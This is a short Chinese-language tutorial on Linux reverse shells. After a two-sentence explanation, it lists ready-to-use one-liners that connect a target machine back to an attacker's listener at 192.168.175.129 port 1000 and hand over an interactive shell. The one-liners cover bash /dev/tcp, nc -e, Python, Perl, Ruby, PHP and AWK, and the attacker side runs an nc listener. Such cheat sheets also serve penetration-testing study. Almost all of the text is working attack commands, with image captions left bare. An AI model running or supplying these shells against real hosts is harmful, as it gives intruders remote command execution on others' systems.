Linux反弹shell

      0x01. bash

反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。

在攻击主机上执行端口监听：

nc -lvvp port                //port 为攻击主机端口

 

在目标主机上执行：

bash -i >& /dev/tcp/攻击主机ip/port 0>&1                            //port 为攻击主机端口号

查看攻击主机是否连接成功

0x02. nc(netcat)反弹

在攻击主机上执行端口监听：

nc -lvvp port                               //port 为攻击主机端口号，并且此端口号没有被占用

 

在目标主机上执行：

nc -e /bin/bash 攻击主机ip port

 返回攻击主机查看是否连接成功，成功之后如下所示：

常见脚本反弹

以上脚本是在目标主机上执行，其中 x.x.x.x 均为攻击主机ip，并且需要提前在攻击主机上进行监听相关端口,接下来就不再赘述

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.175.129",1000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

攻击主机

 

目标主机

 perl：

perl -e '
use Socket;
$i="192.168.175.129";
$p=1000;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");
exec("/bin/sh -i");};'

 攻击主机

目标主机

Ruby

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.175.129","1000");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

攻击主机

目标主机

 PHP

php -r '$sock=fsockopen("192.168.175.129",1000);exec("/bin/bash -i <&3 >&3 2>&3");'

攻击主机

目标主机

 AWK

awk 'BEGIN{s="/inet/tcp/0/192.168.175.129/1000";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'

 攻击主机

 

目标主机